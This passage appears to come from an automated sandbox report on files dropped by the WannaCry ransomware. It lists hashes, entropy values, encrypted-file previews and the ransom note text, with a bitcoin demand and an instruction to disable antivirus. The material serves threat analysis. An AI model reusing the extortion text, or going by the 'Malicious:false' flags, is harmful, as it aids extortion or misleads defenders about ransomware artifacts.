                                                                              SHA-512:A6A40CE4C896B941A35DA87FD68C58BF8809FBF1A9C659A34E8EF66AB1C3D55129F910E30CF5C449CB2C874B024A0607861E4B58775BD87B73FABED7C7086D37
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......f.]......NLv.7}..d.....W.<....{.>|.D. .|.'C..C..[3x.:.zR..n...p....8..:+>8nD.S\.5]...s.S(K.....8_.....6.*..By@k%. 4..@!Z.B.B..:"..v...C..B..W'...@gT|.s.."$+*2[.n....& ..D+u.*...*..C.&~B...}.........1n.v\..&..dU..2si.F}..f. .\hM<.0Z..q...#!...............;L.B. ..E.60......X.>e-..E.?.........!J[4...4.U.GS.O...|..._..?.S.l.j.....x...o..x...bU.[.)........B.._MS|.4.q+J....;..f....!c..G..a..P9.......u].sk..'.......#.....w.LU..g%.J;....&B.(#.R.i./..G..cY.F...d.......T.!g...w..\....O.M.B..@.yg)RboCG.!.i.0.......n.O0.D.$d.y.9.KT..:D.....4.G......n...S.=8dNp.&.G....3..e:..%._.i.[.8.7\.E(7;sp....-..........c..@..XhF......_.pk..........`T9|o.d...<".f$/.d&...r".....#...C.h.....\Z8....f..S.!...(x.2.!...._.|#....7..j?.Zu.<....9.."...Q..2R..."...O..[....)..|....mb.2....1q.X..a... .[}%C..EJ.:.....P._N...9Kkk..xu.$..K...!.......C...x]z.b..S.b*%...1.........l...\....9.>i>...&...gm...}M.{.V..\!...(D...k.EkxJk..t......g5.&.s{^|. .....h/F..M.yj...k|.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.792654943027224
                                                                              Encrypted:false
                                                                              SSDEEP:24:v8++HTOogvtf4LoHuXXjDgMBy85Ykuo28U5mGVLaPwL6Jkm:k++HcpUmuXXoXpkHa6em
                                                                              MD5:B69AB8B9FE4AA388A2188D8E9A1CA0FF
                                                                              SHA1:420BB120E3C71ACEE303E39FAD81461D9D8E966A
                                                                              SHA-256:C4E6946D51A4EE80C2E8D87FEECC85D22ABCC2DB64E5A876A51D095589D3CA0A
                                                                              SHA-512:D1833D5F01A093CED1DC863F3B2FBBFFA5A85214265FCA148C4C301CEC97FA4B1DC457F7A821B674250A380498A948740C2B6C0CBBAB49CD547583AF143B5CFF
                                                                              Malicious:false
                                                                              Preview:.....N...T.I.%...?>.9....M7..W.W......K..,....4.6.K4....:|..n5..H.0&.../.'..>....6...kt.Z..=...I.9Ok.>...>w..>.U....uA...\..8........W.Z..k ...[..5...}..e;....h.....Cz....U.......D&.`d.IY...4.{.*z..^..[.c.. .~V..C...NbD..P.t..a..U...`....!.;H.ne.M.w.... ....=6...K......P.I.....y3K...9....>'\......ZG.0.......L.6..L.0.....y.H..J..iW....o.N.'...<...~...W .8........DF.$.$.K0...Z..0..#`O+....3.........V$.]...>....P.y.\...YIY.J6.C.......d.1St.rv',...y....o.V.Q....E....*....7..R...C.[...i.k.........,,j.8-k....ZT9....7.AI^.$.}B..k7m..|...]RQS..y\.A...w......... !M+....&..<...".......6.iw.@.@.."...V...+.. )..'..Ldx...A...~(.........._..j...AJ1.8.Q.....".Q....&..........1.>(..Z..j.(S'.x.|.4..4.j.b..VR....}..(....Ag.Ua...~.b..-.'.V.^.\[..+r......;5..Q.[.?...J.e........b.$.._.Cq...{WHz.go.R|..?..Yt.2P...].....L.#....r.....A.....S".SM..O.0;.s..$..U.-za..\.Ax.%............J.@..-...~.X1?sm`.._.............^..:.}..p...KG..5.......F..].s.....b....x.V%....Q..S..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848054196186342
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEbUAXpugNRBqGz+2qSLX6r0tHWBxKvtn+ieaAngyThPCT9S+jzC5eQrphA79BY:bkEbHsgN9MSr6jBxKVn3eaAngcP2Fikm
                                                                              MD5:164B631DA39126D2AF084F147E9D12CE
                                                                              SHA1:68F5EBE89A92FDD916F79C9F8901B64EAC3B4FED
                                                                              SHA-256:20B4015A98CF5C3445196FAEB57527844399681B5FD06A06B7B639AD94519EEF
                                                                              SHA-512:474B75E3A25A21BC7D9D4F690EE42AD22DFD5EE7C232BD8BDB4CC38BF5E1555AC179C40A7FFCF8A8982D717C8E695CED64EF058A563C61F26F0B8557264EE96A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......x\.L..x.....L..h.J....LbhuD....k.M...'h.?..(..w.....X..p..V%.S.F...,......].._..^J).TZ..t.....p..0Y........f...;........]Y..C.....$R...k...4......;.>...1.H...I.6..6..u...&p....>:_...:.&..`%p.|.....d.^...b..^.s3,5)j......K=.A..4`..b.|..Z..D.................1.R...H.........P.W^.>..9..W..m.|v....Ak.H....C...0#...5.BFe...`.\ft>....IGg.(".....2....E....Dj......".GB..w..w@e..h[.."E%.n.zAI3A....A............q..f.!.d...D.....:r.c..Nh..a..8.2.p...yt.......1..9s..fp2..$...-%....t..Lq..n.!cd....b.....s...Q.....-.Y..2!..(,.ax.Q,.....v......,...#.`...c...I.{5.....\.J.s.... O.....JP.#..f..*<'.3...f......3.nI..+&.......&s....-..v..e{.sX.Evi......, ..fN.\....?~.9.W.+..........b.8.rC.a<b$.......c.Z."...s...s]....E3.Z..BB&m`2..C`.....!..(.qf".L .D.{.{..s.c..L...n...Fs.}.Z.S;.9.....#...u...Rc....b.....f_c.~..H.#.....\.{.8... ...V..~jr..^>A.....#..:.......!C3.'.;......w7...Q...J..>.^S..L....:.c.b.[z.v.$.`?.....-...\...98Xt..U.G3...Z...GK..b.h..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848054196186342
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEbUAXpugNRBqGz+2qSLX6r0tHWBxKvtn+ieaAngyThPCT9S+jzC5eQrphA79BY:bkEbHsgN9MSr6jBxKVn3eaAngcP2Fikm
                                                                              MD5:164B631DA39126D2AF084F147E9D12CE
                                                                              SHA1:68F5EBE89A92FDD916F79C9F8901B64EAC3B4FED
                                                                              SHA-256:20B4015A98CF5C3445196FAEB57527844399681B5FD06A06B7B639AD94519EEF
                                                                              SHA-512:474B75E3A25A21BC7D9D4F690EE42AD22DFD5EE7C232BD8BDB4CC38BF5E1555AC179C40A7FFCF8A8982D717C8E695CED64EF058A563C61F26F0B8557264EE96A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......x\.L..x.....L..h.J....LbhuD....k.M...'h.?..(..w.....X..p..V%.S.F...,......].._..^J).TZ..t.....p..0Y........f...;........]Y..C.....$R...k...4......;.>...1.H...I.6..6..u...&p....>:_...:.&..`%p.|.....d.^...b..^.s3,5)j......K=.A..4`..b.|..Z..D.................1.R...H.........P.W^.>..9..W..m.|v....Ak.H....C...0#...5.BFe...`.\ft>....IGg.(".....2....E....Dj......".GB..w..w@e..h[.."E%.n.zAI3A....A............q..f.!.d...D.....:r.c..Nh..a..8.2.p...yt.......1..9s..fp2..$...-%....t..Lq..n.!cd....b.....s...Q.....-.Y..2!..(,.ax.Q,.....v......,...#.`...c...I.{5.....\.J.s.... O.....JP.#..f..*<'.3...f......3.nI..+&.......&s....-..v..e{.sX.Evi......, ..fN.\....?~.9.W.+..........b.8.rC.a<b$.......c.Z."...s...s]....E3.Z..BB&m`2..C`.....!..(.qf".L .D.{.{..s.c..L...n...Fs.}.Z.S;.9.....#...u...Rc....b.....f_c.~..H.#.....\.{.8... ...V..~jr..^>A.....#..:.......!C3.'.;......w7...Q...J..>.^S..L....:.c.b.[z.v.$.`?.....-...\...98Xt..U.G3...Z...GK..b.h..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7978929183400725
                                                                              Encrypted:false
                                                                              SSDEEP:24:MVcTY4hXFqx1BUmx1NjR/inR85kG733onqifhVkKbeLzl:5Y45o3r1N9UR4Yobzl
                                                                              MD5:9982E2BE827EE6CA3B730E915CCFF838
                                                                              SHA1:4B666C081BEA525A8B41C88220CCC8936374AF45
                                                                              SHA-256:0A0C4669DCA468A194982409C3C69E1B432FB1CDB466C0E1175B134ABBD69AC6
                                                                              SHA-512:B7F85D7F77807F504FFB07C050C7577E1B2CFD14A2937F14FFD18323FC23B2058FBDC887A8D05FFF259F71A2A16FCB53D0E9430B0E2C08245309F714F9D6D308
                                                                              Malicious:false
                                                                              Preview:....|..d.....&s........%<4.*..p.;.Uo.z....YP.t@..@..oT.%.....4.pU.w..L..P.o.4...L2}W)Y.E..FL....ow1/.I.-E. ...|.n.70E.B.=W.4...u..m........L..eL8u.5........%....t....9p..VOO....[.w...0...<..|.`v.......D....Az....L....'|.../.."X.^......FK..'%.r.L4.d.{^^......L.I6N.......cH...G.>.a:.)s.i.-.._.._..I.r...6.5..v@dX.......(..B..&....9...D.<C..N\.1X.....x......T..O......^.}.>...n#&.56.49.S.Z.........>.K..2)2.k...d-?s/3G.;.n4g..A........u. ..qf.......R.T?...<..9..H..;.Q.R.....`_.!....I.P.!..(g..^..pT{.X....f..H....D{......." E1..p..}R~....8.}...........V.yL.d?0.\....W.....)..$.3\.....*..C#.`e..../..2..I.|./.Gh.^.B.*..?1\.m.qD.@.........@0.Tv..Z.....o..t]+..#...&.f..1PW.c..5...A..h..O[...l....`\.q.........V..eAJ....K.|...X.5.p..7......`.!.....v(...$..L../..6..(.M4...;sX.Q...=.L....Q.k..[7r.G...S.t....N..q..d[n...>q.....F..R....K.b.}.....b.f..... .<..e. Q.~.X.^.8b./...u2rf<..]....1.T.iW...3.f.....d..........[..E.0....!*T@>o...L..[...d..;
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.855541572070346
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk+E3UU06wRY2UXIZokeong5YWW336+DGeQRviW4hu48GdUXRwXnWOAGx5hJH:bkH3R/dXIGkeoneC336ML01XRwXnZ/
                                                                              MD5:2E9C72C099C634299B09AA6080D3C2ED
                                                                              SHA1:87F7FA456066979A795AC78D4C7F285AC7193CB4
                                                                              SHA-256:86BF41D87692CA31628609096EDBD364602290B2D513B0304FE306CF47E2D686
                                                                              SHA-512:D3B46AB451B5A9DBB8434048F7F4F009432C0EEA8A514ECA6446F9E5950AD175C6B7060CCEFF795824AF9AFE3B5D3005F5F0811B1FBDDC0DB3334DF29939B77D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....vt.}9.5............v.....3.`3....[8.....@....?.!zM.E...C..-.....)a_...S...thvF.K|....?.5=v.....m.....U.^......r.....r..Td.........r.+.....;....Z...%.Z..\..b....iX0.Q.(..E.x....g6-..S....#6.V...N..b..1.....3jV....7.k`...........Oz;....*:..............s.O.]I.D).S..../....._a..S%...........f...FZ..T...L.y[M=`q.....K{%.;L:<g}.Z.(.m|.l~.k..Xp0..F...6.0...8..h.$c.n...X..1e..w...YSf5gY1,A<...e..q{....=..a,L...L..~.u....qG.'.v..Q....V..8...c....H@Tv.@..-....~...f ...`.X.....?..0..B}N.7G8.......[a.ut.......g.h+l..t....Q.[7.(.IVY.w.z.........../.&......_..w........M?...q..N...2........gZ.+h.Cv..m.kJ.........#&.&R..r.|.ss.HG.".L.K.....RWwxE...T.....Zz..y..N....Y`.@..g...}........H.._.....j.B........g....@......D.*.CNv\..:/..IR.......H....&<....Xor. .>g..4.......D...d.}...'...-G.? .`[...YO.:_2..uD{.vL..e6v.%...x0am....Js..7.7....A......:p..m.H..k.`..`.....x...x... ../..s_C:p.4#+...6aw.|.c..ir..\~.>........m{T....B.i...E...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.855541572070346
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk+E3UU06wRY2UXIZokeong5YWW336+DGeQRviW4hu48GdUXRwXnWOAGx5hJH:bkH3R/dXIGkeoneC336ML01XRwXnZ/
                                                                              MD5:2E9C72C099C634299B09AA6080D3C2ED
                                                                              SHA1:87F7FA456066979A795AC78D4C7F285AC7193CB4
                                                                              SHA-256:86BF41D87692CA31628609096EDBD364602290B2D513B0304FE306CF47E2D686
                                                                              SHA-512:D3B46AB451B5A9DBB8434048F7F4F009432C0EEA8A514ECA6446F9E5950AD175C6B7060CCEFF795824AF9AFE3B5D3005F5F0811B1FBDDC0DB3334DF29939B77D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....vt.}9.5............v.....3.`3....[8.....@....?.!zM.E...C..-.....)a_...S...thvF.K|....?.5=v.....m.....U.^......r.....r..Td.........r.+.....;....Z...%.Z..\..b....iX0.Q.(..E.x....g6-..S....#6.V...N..b..1.....3jV....7.k`...........Oz;....*:..............s.O.]I.D).S..../....._a..S%...........f...FZ..T...L.y[M=`q.....K{%.;L:<g}.Z.(.m|.l~.k..Xp0..F...6.0...8..h.$c.n...X..1e..w...YSf5gY1,A<...e..q{....=..a,L...L..~.u....qG.'.v..Q....V..8...c....H@Tv.@..-....~...f ...`.X.....?..0..B}N.7G8.......[a.ut.......g.h+l..t....Q.[7.(.IVY.w.z.........../.&......_..w........M?...q..N...2........gZ.+h.Cv..m.kJ.........#&.&R..r.|.ss.HG.".L.K.....RWwxE...T.....Zz..y..N....Y`.@..g...}........H.._.....j.B........g....@......D.*.CNv\..:/..IR.......H....&<....Xor. .>g..4.......D...d.}...'...-G.? .`[...YO.:_2..uD{.vL..e6v.%...x0am....Js..7.7....A......:p..m.H..k.`..`.....x...x... ../..s_C:p.4#+...6aw.|.c..ir..\~.>........m{T....B.i...E...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.828106730683323
                                                                              Encrypted:false
                                                                              SSDEEP:24:u4eZOJcOjIfSajIW9rV5vTCrfuLAy3Lm4p8uwDtJLb7x8/hpGOn:unZOJ0SajJLL3LhwDtJLxsfn
                                                                              MD5:4A3062225C4CFABA8C472AB791E77700
                                                                              SHA1:573B46912B78E88E0F8B032B4D5B5212DA23FF7B
                                                                              SHA-256:2AACE75E11905C67223DF174257617473A4F665F0282527C11E6ACD8712A9A34
                                                                              SHA-512:0CC8AA4E71AC9A9F274CAE3390EEA6AF16F95A9315A42D027A9CED2BE2EE6EA8A269E839261353F812A57D5D7042391F02631AC52DA2757B78360629A67466E7
                                                                              Malicious:false
                                                                              Preview:..........c).g..J4..:...>.7.1.....@...l?....4..g..B^..y[V;Y..pg..(..........~..,..O..K.Tqp.PB...?Ti*...5......+R./..$&a.l...$),=.E....F......x.A..Hd..........Oeb..=s..`..8q.h.QH...y.H.n...eM.%......$..|y._...n.W.r.@Qs..nGV.SM........4.y.......;....K...i.RB..9~.......i.....D....B.]..VzZ.i....0.1Z.._Y..o:.1..LoUo....3..*.?..O.m.j.....Lyt07.c/.?v...._4.6.-r....@*.x........e.A^...rp.......h..+.Z.L:<..&JML.K.K/?1......`..z..]:0......Y...J. U...A.9........9..N....-..B;E........,.*2c.6J....7hkqO..........KHkHw2..t.....p.)._.`.w.....\T..`..<......'._!....F.......1..r..]moV....>............9....e.F.?.|_cu~*.T.cm.f..c`.o.i.T...:5f.B....%l.&...1.+v&Z.6.kH.....{..g.._..0S.!....\...*...J./.....N9T..Y.R..........^....I......s.u...)....QH. Sl.q...Qd&.0.[.yA...K..d.".-.S.d ....T...8.2p.>..}".y..B.\[1OOyq".2J.;...VM.o.8..m...0....ie&.U.....p......[..`....~..Z.E.p...5..U.....S....G3...6S...%.1h.I......f.9UU.7>.........bU..Eo..-@W)A.G.I.V.4.=A.1Y=...*..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837498359981468
                                                                              Encrypted:false
                                                                              SSDEEP:24:bktbHwRALV4dEWZtYX55Ghsyh8flyKtq1ltudlnxW/i0lpQWXwsUNeS7Yyu2rcI:bkR+AcjYp5GhsFlx4ltud9wi0l15UNec
                                                                              MD5:FD833FB814DD768BB4F78AC4EDFB2C00
                                                                              SHA1:F9CCD5330928864D405F3E25F8FD213396557A71
                                                                              SHA-256:F0A2643B6D120EC64A34FDF2B826E35BB6EAE84D29A74C1DB8944BF94291F4AB
                                                                              SHA-512:D0F79C096F2796223CBD86F9041511F9887A8D8E86AA4C1A1950DA2B00DB548ECA326137CCB7466304DF3B8D36B6AD08D0E6FC3B46A46DF42197B93D7A876F49
                                                                              Malicious:false
                                                                              Preview:WANACRY!......A(X.,....]p-...m..".........&..W.|..qE...K...j......V....A.6..\;...P...iKo....d=..e.v...n:'.f.9.x..9........>.w|DF.Z..D%.QN@...1S1+.Y.....O.3...v~..$.]?......a..A....a.z.nQ.a_.Y.K.h.w...ua...e..m6.J.\..........l.z~.ft..[K..4..(.x...2..C....k..............*?>.E.6...q..;Ye.Ad)9..gw.........,.....Xq0....V..8...:.y=.:..Oc...JOeD...K..gN#.,h.x.6.......UU....:..l%.?#........Ui..X.T..3.je.I...$....M.9m.\^=.!'%. .....@.d..2.P.09A...f...dG....w..C.s...k..@..c...[.u...Q..}.....T..2L4 ..3.R..;.C ..:o...."$..B.&.,.n.~...E.#.96n..CW.P...............>.....g......-.x..de..J.w.......j....+.C...a...+...$.^S/..6%.6.rk............$..W.~.L:.l..].5.B.b....g#.........a...Q..b........9...F(.W{..B.?.........d-.W......m|......e4..<6.F..M.a..[[.<t.4.oF..9..S..e"...]..4.}gC.M.li.x....#....6G.o.y...T:........#........o.d....#..zL.K...M.r.0.^Y.K.@.....?.!..hJ......U-W....YK*..=<.,.....AY.....tD..b.....p%.`N... ./G.a-.[......."0..iC.7\..71q.n.8...:n.2A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837498359981468
                                                                              Encrypted:false
                                                                              SSDEEP:24:bktbHwRALV4dEWZtYX55Ghsyh8flyKtq1ltudlnxW/i0lpQWXwsUNeS7Yyu2rcI:bkR+AcjYp5GhsFlx4ltud9wi0l15UNec
                                                                              MD5:FD833FB814DD768BB4F78AC4EDFB2C00
                                                                              SHA1:F9CCD5330928864D405F3E25F8FD213396557A71
                                                                              SHA-256:F0A2643B6D120EC64A34FDF2B826E35BB6EAE84D29A74C1DB8944BF94291F4AB
                                                                              SHA-512:D0F79C096F2796223CBD86F9041511F9887A8D8E86AA4C1A1950DA2B00DB548ECA326137CCB7466304DF3B8D36B6AD08D0E6FC3B46A46DF42197B93D7A876F49
                                                                              Malicious:false
                                                                              Preview:WANACRY!......A(X.,....]p-...m..".........&..W.|..qE...K...j......V....A.6..\;...P...iKo....d=..e.v...n:'.f.9.x..9........>.w|DF.Z..D%.QN@...1S1+.Y.....O.3...v~..$.]?......a..A....a.z.nQ.a_.Y.K.h.w...ua...e..m6.J.\..........l.z~.ft..[K..4..(.x...2..C....k..............*?>.E.6...q..;Ye.Ad)9..gw.........,.....Xq0....V..8...:.y=.:..Oc...JOeD...K..gN#.,h.x.6.......UU....:..l%.?#........Ui..X.T..3.je.I...$....M.9m.\^=.!'%. .....@.d..2.P.09A...f...dG....w..C.s...k..@..c...[.u...Q..}.....T..2L4 ..3.R..;.C ..:o...."$..B.&.,.n.~...E.#.96n..CW.P...............>.....g......-.x..de..J.w.......j....+.C...a...+...$.^S/..6%.6.rk............$..W.~.L:.l..].5.B.b....g#.........a...Q..b........9...F(.W{..B.?.........d-.W......m|......e4..<6.F..M.a..[[.<t.4.oF..9..S..e"...]..4.}gC.M.li.x....#....6G.o.y...T:........#........o.d....#..zL.K...M.r.0.^Y.K.@.....?.!..hJ......U-W....YK*..=<.,.....AY.....tD..b.....p%.`N... ./G.a-.[......."0..iC.7\..71q.n.8...:n.2A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.805321107143964
                                                                              Encrypted:false
                                                                              SSDEEP:24:hTIpbjx+gTQE7eo1zCqUn1DvqSSrfDA0x9JJMOqu5soX1X/34LvZbQ:FISg5y7r1zqSSrfDA0QOqaR/2ZbQ
                                                                              MD5:95D1FC2460B85A4D26985217AA8E8926
                                                                              SHA1:3220DDEBB1DCC78D50EAC6EBCA9F9AA882D18692
                                                                              SHA-256:65D9F4DD7879DF07D734F97FD220A5A1CE7AA124FB6F52F7BB0DAF3EE1A7F5B5
                                                                              SHA-512:6E8A2E4B8C5F5B20AEC67FAE927F0C2FB5A6510CB03E51B8932AF9DA6C92F623290C842B8C233B45684A7B2815FA5153A20E8FC73195044997BD30FA33B419B4
                                                                              Malicious:false
                                                                              Preview:....r....G6..2.P./.V..!+......r...5...61../.Zu.&.q...v.....]..o.......ho..f.*....nJ\yf..*.L...[i...-a.vB.E%....h.6.Y.,.......K.>...I ..t...i.....H..s..L6_O.0..r. A...I$"..y..:._.E..AH..Z......,..`.4....#(.W.....1..?,oE.7%..Q......?.vI.....ln\.....(F$...T.e..96..V.5.c...'j.G_.#..W70.{..wW.H.sU..........(.....-vD.4..:G...m...<..^G..'@U.........`.......5..O...bf.4p.P7_4....%..:./0.-...,...6.`.`j=................|;0..JJv..=...o.......).dff.DE..u..<96.. .........h..d..2[6.......{w.jG.P./)S.I~.......v..Drz....B...xv...'....$.C..8.!6.....\yt4.B.f\fj=K.O.j.Hv...6.bZ.oK....^z<].;...+.#"3...#+v..=|A&..X...`;.|..H.K...Bg..~.;a...z.>..^\.J%.l.a.....YYx...-..X.....z..$[...m...*.4.;.'..seL.}........S.[!.[. .u1Y..V.0cD>..bi.....pg..;.....p.u.....0#C..f ..\...d...*g.#(...uW..O.t#.U.y.H^..Q..\....<..f....-M.`......P.g.J...$%....."..D.q..2R.].B{[..........Vxj)}.I..)d...n{..f.....H.KI8.9...R.4.....z)...F.LI;...K.<.c3.g_...r*_...de2...`.].(W.M.T4.Tr..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.836121120274953
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkq/jtcYxEj2GK7U508nlEKWnLp1gmBKVmXWJNSu09LzMAxU0jyUBeDVuJW:bk8jQdaQuKWnLU2KVmXWJ/0ZMAxjygeF
                                                                              MD5:83F171CBBB77774FE13B76336138A741
                                                                              SHA1:BD653A293FD573EE59157C743E5AD3E6220D15FE
                                                                              SHA-256:A0410023153311C584794B348CA416FA308DA6A1BBE824B9CBA7A4C57B9740FA
                                                                              SHA-512:7DAAD87494EBA9AAE851EEC6C7EBF38EFED4C3BCD10F29296F009347274E691FD6B5C74F95816700532400A757AD7596A84DA73C2B37F7B5B93EC8E7620E00BB
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....%.rl^;..fb..[*..,7."4.r..gFS..<`5K..~..].>.j4Lx.%..0.......zE.&..~.:Q[1q(E.....g...bA.H.Z....<e.:Z..y..q....}...9.x.#E..N.P.|R0&.....6*..)...g.J.}......`.....H..>.5C.cKH.>.&..0gk....l...b.l...{...l..=Z.K.+0S......"..?.7.o.o..k'....qm...`...................rV.Y....>..Z...(..{......s..a.v.<Ui..8.......].C........A.v./q...x.-..V...g(d.,%.@T.6.$:....).D.."./......&.Ql...j..kg..c?V.j.3yG.1."..p..e.tf:T...........D1.g..{.`...7./.aV..m.N3.(..G..PUWC.q'....9Ko....\.....T.mpDV{r..o.hr...3...yx nJ7 Mha.y..a.t...I.i.B..vpL.....`n..=p}......b_......&9P1!N^\....Sn|..p.$..$d>..'m....?al.G.....+...b|...N..D'g.S.g.R.%.B.T.....^_..t.6.............. @Y...V.c.y.L....A.Yh..D.}}3.%.d.g..^.a...s..9....X...'..d....&/.d-.x$[./....d..W@!.LX.h....I..G...kl."..<g.@..@.9.......|d..I[{.. .....a.".r.g5..Q..*..(...+..R..M.5.%.ZW@..K}....B....G......d*....k...m'...'..Qy..X.\.Z.......v....4su...p....e...H..{|...\.........J.19 ...r3.+...4....o.<....*
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.836121120274953
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkq/jtcYxEj2GK7U508nlEKWnLp1gmBKVmXWJNSu09LzMAxU0jyUBeDVuJW:bk8jQdaQuKWnLU2KVmXWJ/0ZMAxjygeF
                                                                              MD5:83F171CBBB77774FE13B76336138A741
                                                                              SHA1:BD653A293FD573EE59157C743E5AD3E6220D15FE
                                                                              SHA-256:A0410023153311C584794B348CA416FA308DA6A1BBE824B9CBA7A4C57B9740FA
                                                                              SHA-512:7DAAD87494EBA9AAE851EEC6C7EBF38EFED4C3BCD10F29296F009347274E691FD6B5C74F95816700532400A757AD7596A84DA73C2B37F7B5B93EC8E7620E00BB
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....%.rl^;..fb..[*..,7."4.r..gFS..<`5K..~..].>.j4Lx.%..0.......zE.&..~.:Q[1q(E.....g...bA.H.Z....<e.:Z..y..q....}...9.x.#E..N.P.|R0&.....6*..)...g.J.}......`.....H..>.5C.cKH.>.&..0gk....l...b.l...{...l..=Z.K.+0S......"..?.7.o.o..k'....qm...`...................rV.Y....>..Z...(..{......s..a.v.<Ui..8.......].C........A.v./q...x.-..V...g(d.,%.@T.6.$:....).D.."./......&.Ql...j..kg..c?V.j.3yG.1."..p..e.tf:T...........D1.g..{.`...7./.aV..m.N3.(..G..PUWC.q'....9Ko....\.....T.mpDV{r..o.hr...3...yx nJ7 Mha.y..a.t...I.i.B..vpL.....`n..=p}......b_......&9P1!N^\....Sn|..p.$..$d>..'m....?al.G.....+...b|...N..D'g.S.g.R.%.B.T.....^_..t.6.............. @Y...V.c.y.L....A.Yh..D.}}3.%.d.g..^.a...s..9....X...'..d....&/.d-.x$[./....d..W@!.LX.h....I..G...kl."..<g.@..@.9.......|d..I[{.. .....a.".r.g5..Q..*..(...+..R..M.5.%.ZW@..K}....B....G......d*....k...m'...'..Qy..X.\.Z.......v....4su...p....e...H..{|...\.........J.19 ...r3.+...4....o.<....*
